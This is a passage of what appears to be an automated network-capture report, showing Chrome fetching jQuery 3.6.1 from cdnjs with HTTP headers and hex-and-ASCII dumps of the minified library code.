                                                                                                                      2024-12-03 07:54:31 UTC1378INData Raw: 2c 6f 2c 61 2c 75 2c 73 2c 6c 2c 63 2c 66 2c 64 2c 70 2c 68 2c 67 2c 76 2c 79 2c 6d 2c 62 2c 78 3d 22 73 69 7a 7a 6c 65 22 2b 31 2a 6e 65 77 20 44 61 74 65 2c 77 3d 65 2e 64 6f 63 75 6d 65 6e 74 2c 43 3d 30 2c 54 3d 30 2c 45 3d 61 65 28 29 2c 4e 3d 61 65 28 29 2c 6b 3d 61 65 28 29 2c 41 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 65 3d 3d 3d 74 26 26 28 66 3d 21 30 29 2c 30 7d 2c 44 3d 7b 7d 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2c 53 3d 5b 5d 2c 4c 3d 53 2e 70 6f 70 2c 6a 3d 53 2e 70 75 73 68 2c 71 3d 53 2e 70 75 73 68 2c 4f 3d 53 2e 73 6c 69 63 65 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 69 66 28 65 5b 6e 5d 3d 3d 3d 74 29
                                                                                                                      Data Ascii: ,o,a,u,s,l,c,f,d,p,h,g,v,y,m,b,x="sizzle"+1*new Date,w=e.document,C=0,T=0,E=ae(),N=ae(),k=ae(),A=function(e,t){return e===t&&(f=!0),0},D={}.hasOwnProperty,S=[],L=S.pop,j=S.push,q=S.push,O=S.slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)
                                                                                                                      2024-12-03 07:54:31 UTC1378INData Raw: 2a 5c 5c 29 7c 29 28 3f 3d 5b 5e 2d 5d 7c 24 29 22 2c 22 69 22 29 7d 2c 51 3d 2f 5e 28 3f 3a 69 6e 70 75 74 7c 73 65 6c 65 63 74 7c 74 65 78 74 61 72 65 61 7c 62 75 74 74 6f 6e 29 24 2f 69 2c 59 3d 2f 5e 68 5c 64 24 2f 69 2c 47 3d 2f 5e 5b 5e 7b 5d 2b 5c 7b 5c 73 2a 5c 5b 6e 61 74 69 76 65 20 5c 77 2f 2c 4b 3d 2f 5e 28 3f 3a 23 28 5b 5c 77 2d 5d 2b 29 7c 28 5c 77 2b 29 7c 5c 2e 28 5b 5c 77 2d 5d 2b 29 29 24 2f 2c 4a 3d 2f 5b 2b 7e 5d 2f 2c 5a 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 28 5b 5c 5c 64 61 2d 66 5d 7b 31 2c 36 7d 22 2b 49 2b 22 3f 7c 28 22 2b 49 2b 22 29 7c 2e 29 22 2c 22 69 67 22 29 2c 65 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 3d 22 30 78 22 2b 74 2d 36 35 35 33 36 3b 72 65 74 75 72 6e 20 72 21 3d 3d 72
                                                                                                                      Data Ascii: *\\)|)(?=[^-]|$)","i")},Q=/^(?:input|select|textarea|button)$/i,Y=/^h\d$/i,G=/^[^{]+\{\s*\[native \w/,K=/^(?:#([\w-]+)|(\w+)|\.([\w-]+))$/,J=/[+~]/,Z=new RegExp("\\\\([\\da-f]{1,6}"+I+"?|("+I+")|.)","ig"),ee=function(e,t,n){var r="0x"+t-65536;return r!==r
                                                                                                                      2024-12-03 07:54:31 UTC1378INData Raw: 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 28 6f 29 29 2c 72 7d 69 66 28 6e 2e 71 73 61 26 26 21 6b 5b 65 2b 22 20 22 5d 26 26 28 21 76 7c 7c 21 76 2e 74 65 73 74 28 65 29 29 29 7b 69 66 28 31 21 3d 3d 43 29 6d 3d 74 2c 79 3d 65 3b 65 6c 73 65 20 69 66 28 22 6f 62 6a 65 63 74 22 21 3d 3d 74 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 7b 28 63 3d 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 63 3d 63 2e 72 65 70 6c 61 63 65 28 74 65 2c 6e 65 29 3a 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 63 3d 78 29 2c 75 3d 28 68 3d 61 28 65 29 29 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 75 2d 2d 29 68 5b 75 5d 3d 22 23 22 2b 63 2b 22 20 22 2b 79 65 28 68 5b 75 5d 29 3b 79 3d 68 2e 6a 6f 69 6e 28 22 2c 22 29
                                                                                                                      Data Ascii: tsByClassName(o)),r}if(n.qsa&&!k[e+" "]&&(!v||!v.test(e))){if(1!==C)m=t,y=e;else if("object"!==t.nodeName.toLowerCase()){(c=t.getAttribute("id"))?c=c.replace(te,ne):t.setAttribute("id",c=x),u=(h=a(e)).length;while(u--)h[u]="#"+c+" "+ye(h[u]);y=h.join(",")
                                                                                                                      2024-12-03 07:54:31 UTC1378INData Raw: 6c 61 62 65 6c 22 69 6e 20 74 26 26 74 2e 64 69 73 61 62 6c 65 64 3d 3d 3d 65 7d 7d 66 75 6e 63 74 69 6f 6e 20 68 65 28 65 29 7b 72 65 74 75 72 6e 20 75 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 74 3d 2b 74 2c 75 65 28 66 75 6e 63 74 69 6f 6e 28 6e 2c 72 29 7b 76 61 72 20 69 2c 6f 3d 65 28 5b 5d 2c 6e 2e 6c 65 6e 67 74 68 2c 74 29 2c 61 3d 6f 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 61 2d 2d 29 6e 5b 69 3d 6f 5b 61 5d 5d 26 26 28 6e 5b 69 5d 3d 21 28 72 5b 69 5d 3d 6e 5b 69 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 67 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 26 26 65 7d 6e 3d 6f 65 2e 73 75 70 70
                                                                                                                      Data Ascii: label"in t&&t.disabled===e}}function he(e){return ue(function(t){return t=+t,ue(function(n,r){var i,o=e([],n.length,t),a=o.length;while(a--)n[i=o[a]]&&(n[i]=!(r[i]=n[i]))})})}function ge(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}n=oe.supp
                                                                                                                      2024-12-03 07:54:31 UTC1378INData Raw: 26 26 6e 2e 76 61 6c 75 65 3d 3d 3d 74 7d 7d 2c 72 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 67 29 7b 76 61 72 20 6e 2c 72 2c 69 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 69 66 28 6f 29 7b 69 66 28 28 6e 3d 6f 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 29 26 26 6e 2e 76 61 6c 75 65 3d 3d 3d 65 29 72 65 74 75 72 6e 5b 6f 5d 3b 69 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 4e 61 6d 65 28 65 29 2c 72 3d 30 3b 77 68 69 6c 65 28 6f 3d 69 5b 72 2b 2b 5d 29 69 66 28 28 6e 3d 6f 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 29 26 26 6e
                                                                                                                      Data Ascii: &&n.value===t}},r.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&g){var n,r,i,o=t.getElementById(e);if(o){if((n=o.getAttributeNode("id"))&&n.value===e)return[o];i=t.getElementsByName(e),r=0;while(o=i[r++])if((n=o.getAttributeNode("id"))&&n
                                                                                                                      2024-12-03 07:54:31 UTC1378INData Raw: 70 75 74 22 29 3b 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 74 79 70 65 22 2c 22 68 69 64 64 65 6e 22 29 2c 65 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 6e 61 6d 65 22 2c 22 44 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5b 6e 61 6d 65 3d 64 5d 22 29 2e 6c 65 6e 67 74 68 26 26 76 2e 70 75 73 68 28 22 6e 61 6d 65 22 2b 49 2b 22 2a 5b 2a 5e 24 7c 21 7e 5d 3f 3d 22 29 2c 32 21 3d 3d 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 65 6e 61 62 6c 65 64 22 29 2e 6c 65 6e 67 74 68 26 26 76 2e 70 75 73 68 28 22 3a 65 6e 61 62 6c 65 64 22 2c 22 3a 64 69 73 61 62 6c 65 64 22 29 2c 68 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 65 29 2e 64 69 73 61 62 6c 65 64 3d 21 30 2c 32 21
                                                                                                                      Data Ascii: put");t.setAttribute("type","hidden"),e.appendChild(t).setAttribute("name","D"),e.querySelectorAll("[name=d]").length&&v.push("name"+I+"*[*^$|!~]?="),2!==e.querySelectorAll(":enabled").length&&v.push(":enabled",":disabled"),h.appendChild(e).disabled=!0,2!
                                                                                                                      2024-12-03 07:54:31 UTC1378INData Raw: 2c 72 3d 30 2c 69 3d 65 2e 70 61 72 65 6e 74 4e 6f 64 65 2c 6f 3d 74 2e 70 61 72 65 6e 74 4e 6f 64 65 2c 61 3d 5b 65 5d 2c 75 3d 5b 74 5d 3b 69 66 28 21 69 7c 7c 21 6f 29 72 65 74 75 72 6e 20 65 3d 3d 3d 70 3f 2d 31 3a 74 3d 3d 3d 70 3f 31 3a 69 3f 2d 31 3a 6f 3f 31 3a 63 3f 50 28 63 2c 65 29 2d 50 28 63 2c 74 29 3a 30 3b 69 66 28 69 3d 3d 3d 6f 29 72 65 74 75 72 6e 20 63 65 28 65 2c 74 29 3b 6e 3d 65 3b 77 68 69 6c 65 28 6e 3d 6e 2e 70 61 72 65 6e 74 4e 6f 64 65 29 61 2e 75 6e 73 68 69 66 74 28 6e 29 3b 6e 3d 74 3b 77 68 69 6c 65 28 6e 3d 6e 2e 70 61 72 65 6e 74 4e 6f 64 65 29 75 2e 75 6e 73 68 69 66 74 28 6e 29 3b 77 68 69 6c 65 28 61 5b 72 5d 3d 3d 3d 75 5b 72 5d 29 72 2b 2b 3b 72 65 74 75 72 6e 20 72 3f 63 65 28 61 5b 72 5d 2c 75 5b 72 5d 29 3a 61 5b
                                                                                                                      Data Ascii: ,r=0,i=e.parentNode,o=t.parentNode,a=[e],u=[t];if(!i||!o)return e===p?-1:t===p?1:i?-1:o?1:c?P(c,e)-P(c,t):0;if(i===o)return ce(e,t);n=e;while(n=n.parentNode)a.unshift(n);n=t;while(n=n.parentNode)u.unshift(n);while(a[r]===u[r])r++;return r?ce(a[r],u[r]):a[


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      9192.168.2.449761104.17.25.144434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:54:31 UTC380OUTGET /ajax/libs/jquery/3.6.1/jquery.min.js HTTP/1.1
                                                                                                                      Host: cdnjs.cloudflare.com
                                                                                                                      Connection: keep-alive
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                      Accept: */*
                                                                                                                      Sec-Fetch-Site: none
                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      2024-12-03 07:54:32 UTC961INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:54:31 GMT
                                                                                                                      Content-Type: application/javascript; charset=utf-8
                                                                                                                      Transfer-Encoding: chunked
                                                                                                                      Connection: close
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Cache-Control: public, max-age=30672000
                                                                                                                      ETag: W/"63091225-797c"
                                                                                                                      Last-Modified: Fri, 26 Aug 2022 18:34:13 GMT
                                                                                                                      cf-cdnjs-via: cfworker/kv
                                                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                                                      Timing-Allow-Origin: *
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      CF-Cache-Status: HIT
                                                                                                                      Age: 2
                                                                                                                      Expires: Sun, 23 Nov 2025 07:54:31 GMT
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=e9viYYKlkl4%2FsmPGbiki9TriIlltndQ66wp7Q8G8TprQg8KsnCE3DHYq%2Bs%2FNiHAxmtw4r%2F%2BxqUabadc9PjhGrikQQ6cAPNbue%2Be9d8prwriGzV2VKxgsR3EqYdwr1nizvy8P%2FlMt"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Strict-Transport-Security: max-age=15780000
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 8ec1fd3ddd2c7ced-EWR
                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                      2024-12-03 07:54:32 UTC408INData Raw: 37 62 65 66 0d 0a 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 31 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f
                                                                                                                      Data Ascii: 7bef/*! jQuery v3.6.1 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Erro
                                                                                                                      2024-12-03 07:54:32 UTC1369INData Raw: 72 6f 74 6f 74 79 70 65 4f 66 2c 73 3d 74 2e 73 6c 69 63 65 2c 67 3d 74 2e 66 6c 61 74 3f 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 2e 66 6c 61 74 2e 63 61 6c 6c 28 65 29 7d 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 2e 63 6f 6e 63 61 74 2e 61 70 70 6c 79 28 5b 5d 2c 65 29 7d 2c 75 3d 74 2e 70 75 73 68 2c 69 3d 74 2e 69 6e 64 65 78 4f 66 2c 6e 3d 7b 7d 2c 6f 3d 6e 2e 74 6f 53 74 72 69 6e 67 2c 79 3d 6e 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2c 61 3d 79 2e 74 6f 53 74 72 69 6e 67 2c 6c 3d 61 2e 63 61 6c 6c 28 4f 62 6a 65 63 74 29 2c 76 3d 7b 7d 2c 6d 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 22 6e 75 6d 62 65 72 22 21 3d 74 79 70 65
                                                                                                                      Data Ascii: rototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,y=n.hasOwnProperty,a=y.toString,l=a.call(Object),v={},m=function(e){return"function"==typeof e&&"number"!=type
                                                                                                                      2024-12-03 07:54:32 UTC1369INData Raw: 2c 6c 61 73 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 65 71 28 2d 31 29 7d 2c 65 76 65 6e 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 67 72 65 70 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 28 74 2b 31 29 25 32 7d 29 29 7d 2c 6f 64 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 67 72 65 70 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 25 32 7d 29 29 7d 2c 65 71 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 6c 65 6e 67 74 68 2c 6e 3d 2b 65 2b 28 65 3c 30 3f 74 3a 30 29 3b 72 65 74 75 72 6e 20 74 68 69
                                                                                                                      Data Ascii: ,last:function(){return this.eq(-1)},even:function(){return this.pushStack(S.grep(this,function(e,t){return(t+1)%2}))},odd:function(){return this.pushStack(S.grep(this,function(e,t){return t%2}))},eq:function(e){var t=this.length,n=+e+(e<0?t:0);return thi
                                                                                                                      2024-12-03 07:54:32 UTC1369INData Raw: 2e 63 61 6c 6c 28 65 5b 72 5d 2c 72 2c 65 5b 72 5d 29 29 62 72 65 61 6b 3b 72 65 74 75 72 6e 20 65 7d 2c 6d 61 6b 65 41 72 72 61 79 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 74 7c 7c 5b 5d 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 65 26 26 28 70 28 4f 62 6a 65 63 74 28 65 29 29 3f 53 2e 6d 65 72 67 65 28 6e 2c 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 3f 5b 65 5d 3a 65 29 3a 75 2e 63 61 6c 6c 28 6e 2c 65 29 29 2c 6e 7d 2c 69 6e 41 72 72 61 79 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 74 3f 2d 31 3a 69 2e 63 61 6c 6c 28 74 2c 65 2c 6e 29 7d 2c 6d 65 72 67 65 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 2b 74 2e 6c 65 6e 67 74 68 2c 72 3d 30 2c 69
                                                                                                                      Data Ascii: .call(e[r],r,e[r]))break;return e},makeArray:function(e,t){var n=t||[];return null!=e&&(p(Object(e))?S.merge(n,"string"==typeof e?[e]:e):u.call(n,e)),n},inArray:function(e,t,n){return null==t?-1:i.call(t,e,n)},merge:function(e,t){for(var n=+t.length,r=0,i
                                                                                                                      2024-12-03 07:54:32 UTC1369INData Raw: 5d 3f 3d 29 22 2b 4d 2b 22 2a 28 3f 3a 27 28 28 3f 3a 5c 5c 5c 5c 2e 7c 5b 5e 5c 5c 5c 5c 27 5d 29 2a 29 27 7c 5c 22 28 28 3f 3a 5c 5c 5c 5c 2e 7c 5b 5e 5c 5c 5c 5c 5c 22 5d 29 2a 29 5c 22 7c 28 22 2b 49 2b 22 29 29 7c 29 22 2b 4d 2b 22 2a 5c 5c 5d 22 2c 46 3d 22 3a 28 22 2b 49 2b 22 29 28 3f 3a 5c 5c 28 28 28 27 28 28 3f 3a 5c 5c 5c 5c 2e 7c 5b 5e 5c 5c 5c 5c 27 5d 29 2a 29 27 7c 5c 22 28 28 3f 3a 5c 5c 5c 5c 2e 7c 5b 5e 5c 5c 5c 5c 5c 22 5d 29 2a 29 5c 22 29 7c 28 28 3f 3a 5c 5c 5c 5c 2e 7c 5b 5e 5c 5c 5c 5c 28 29 5b 5c 5c 5d 5d 7c 22 2b 57 2b 22 29 2a 29 7c 2e 2a 29 5c 5c 29 7c 29 22 2c 24 3d 6e 65 77 20 52 65 67 45 78 70 28 4d 2b 22 2b 22 2c 22 67 22 29 2c 42 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5e 22 2b 4d 2b 22 2b 7c 28 28 3f 3a 5e 7c 5b 5e 5c 5c
                                                                                                                      Data Ascii: ]?=)"+M+"*(?:'((?:\\\\.|[^\\\\'])*)'|\"((?:\\\\.|[^\\\\\"])*)\"|("+I+"))|)"+M+"*\\]",F=":("+I+")(?:\\((('((?:\\\\.|[^\\\\'])*)'|\"((?:\\\\.|[^\\\\\"])*)\")|((?:\\\\.|[^\\\\()[\\]]|"+W+")*)|.*)\\)|)",$=new RegExp(M+"+","g"),B=new RegExp("^"+M+"+|((?:^|[^\\
                                                                                                                      2024-12-03 07:54:32 UTC1369INData Raw: 6e 67 28 31 36 29 2b 22 20 22 3a 22 5c 5c 22 2b 65 7d 2c 6f 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 54 28 29 7d 2c 61 65 3d 62 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 21 30 3d 3d 3d 65 2e 64 69 73 61 62 6c 65 64 26 26 22 66 69 65 6c 64 73 65 74 22 3d 3d 3d 65 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 7d 2c 7b 64 69 72 3a 22 70 61 72 65 6e 74 4e 6f 64 65 22 2c 6e 65 78 74 3a 22 6c 65 67 65 6e 64 22 7d 29 3b 74 72 79 7b 48 2e 61 70 70 6c 79 28 74 3d 4f 2e 63 61 6c 6c 28 70 2e 63 68 69 6c 64 4e 6f 64 65 73 29 2c 70 2e 63 68 69 6c 64 4e 6f 64 65 73 29 2c 74 5b 70 2e 63 68 69 6c 64 4e 6f 64 65 73 2e 6c 65 6e 67 74 68 5d 2e 6e 6f 64 65 54 79 70 65 7d 63 61 74 63 68 28 65 29 7b 48 3d 7b 61 70 70 6c 79 3a 74 2e 6c 65
                                                                                                                      Data Ascii: ng(16)+" ":"\\"+e},oe=function(){T()},ae=be(function(e){return!0===e.disabled&&"fieldset"===e.nodeName.toLowerCase()},{dir:"parentNode",next:"legend"});try{H.apply(t=O.call(p.childNodes),p.childNodes),t[p.childNodes.length].nodeType}catch(e){H={apply:t.le
                                                                                                                      2024-12-03 07:54:32 UTC1369INData Raw: 72 20 72 3d 5b 5d 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 20 65 28 74 2c 6e 29 7b 72 65 74 75 72 6e 20 72 2e 70 75 73 68 28 74 2b 22 20 22 29 3e 62 2e 63 61 63 68 65 4c 65 6e 67 74 68 26 26 64 65 6c 65 74 65 20 65 5b 72 2e 73 68 69 66 74 28 29 5d 2c 65 5b 74 2b 22 20 22 5d 3d 6e 7d 7d 66 75 6e 63 74 69 6f 6e 20 6c 65 28 65 29 7b 72 65 74 75 72 6e 20 65 5b 53 5d 3d 21 30 2c 65 7d 66 75 6e 63 74 69 6f 6e 20 63 65 28 65 29 7b 76 61 72 20 74 3d 43 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 66 69 65 6c 64 73 65 74 22 29 3b 74 72 79 7b 72 65 74 75 72 6e 21 21 65 28 74 29 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 21 31 7d 66 69 6e 61 6c 6c 79 7b 74 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 74 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 72 65 6d 6f 76 65
                                                                                                                      Data Ascii: r r=[];return function e(t,n){return r.push(t+" ")>b.cacheLength&&delete e[r.shift()],e[t+" "]=n}}function le(e){return e[S]=!0,e}function ce(e){var t=C.createElement("fieldset");try{return!!e(t)}catch(e){return!1}finally{t.parentNode&&t.parentNode.remove
                                                                                                                      2024-12-03 07:54:32 UTC1369INData Raw: 20 74 2c 6e 2c 72 3d 65 3f 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 3a 70 3b 72 65 74 75 72 6e 20 72 21 3d 43 26 26 39 3d 3d 3d 72 2e 6e 6f 64 65 54 79 70 65 26 26 72 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 26 26 28 61 3d 28 43 3d 72 29 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2c 45 3d 21 69 28 43 29 2c 70 21 3d 43 26 26 28 6e 3d 43 2e 64 65 66 61 75 6c 74 56 69 65 77 29 26 26 6e 2e 74 6f 70 21 3d 3d 6e 26 26 28 6e 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3f 6e 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 75 6e 6c 6f 61 64 22 2c 6f 65 2c 21 31 29 3a 6e 2e 61 74 74 61 63 68 45 76 65 6e 74 26 26 6e 2e 61 74 74 61 63 68 45 76 65 6e 74 28 22 6f 6e 75 6e 6c 6f 61 64 22 2c 6f 65 29 29 2c 64 2e 73 63 6f 70 65 3d
                                                                                                                      Data Ascii: t,n,r=e?e.ownerDocument||e:p;return r!=C&&9===r.nodeType&&r.documentElement&&(a=(C=r).documentElement,E=!i(C),p!=C&&(n=C.defaultView)&&n.top!==n&&(n.addEventListener?n.addEventListener("unload",oe,!1):n.attachEvent&&n.attachEvent("onunload",oe)),d.scope=
                                                                                                                      2024-12-03 07:54:32 UTC1369INData Raw: 65 28 6f 3d 69 5b 72 2b 2b 5d 29 69 66 28 28 6e 3d 6f 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 29 26 26 6e 2e 76 61 6c 75 65 3d 3d 3d 65 29 72 65 74 75 72 6e 5b 6f 5d 7d 72 65 74 75 72 6e 5b 5d 7d 7d 29 2c 62 2e 66 69 6e 64 2e 54 41 47 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 3f 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 3f 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 65 29 3a 64 2e 71 73 61 3f 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 65 29 3a 76 6f 69 64 20 30 7d 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20
                                                                                                                      Data Ascii: e(o=i[r++])if((n=o.getAttributeNode("id"))&&n.value===e)return[o]}return[]}}),b.find.TAG=d.getElementsByTagName?function(e,t){return"undefined"!=typeof t.getElementsByTagName?t.getElementsByTagName(e):d.qsa?t.querySelectorAll(e):void 0}:function(e,t){var
                                                                                                                      2024-12-03 07:54:32 UTC1369INData Raw: 65 45 6c 65 6d 65 6e 74 28 22 69 6e 70 75 74 22 29 3b 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 74 79 70 65 22 2c 22 68 69 64 64 65 6e 22 29 2c 65 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 6e 61 6d 65 22 2c 22 44 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5b 6e 61 6d 65 3d 64 5d 22 29 2e 6c 65 6e 67 74 68 26 26 79 2e 70 75 73 68 28 22 6e 61 6d 65 22 2b 4d 2b 22 2a 5b 2a 5e 24 7c 21 7e 5d 3f 3d 22 29 2c 32 21 3d 3d 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 65 6e 61 62 6c 65 64 22 29 2e 6c 65 6e 67 74 68 26 26 79 2e 70 75 73 68 28 22 3a 65 6e 61 62 6c 65 64 22 2c 22 3a 64 69 73 61 62 6c 65 64 22 29 2c 61 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 65 29 2e 64 69
                                                                                                                      Data Ascii: eElement("input");t.setAttribute("type","hidden"),e.appendChild(t).setAttribute("name","D"),e.querySelectorAll("[name=d]").length&&y.push("name"+M+"*[*^$|!~]?="),2!==e.querySelectorAll(":enabled").length&&y.push(":enabled",":disabled"),a.appendChild(e).di


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      10192.168.2.449762152.199.21.1754434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      TimestampBytes transferredDirectionData
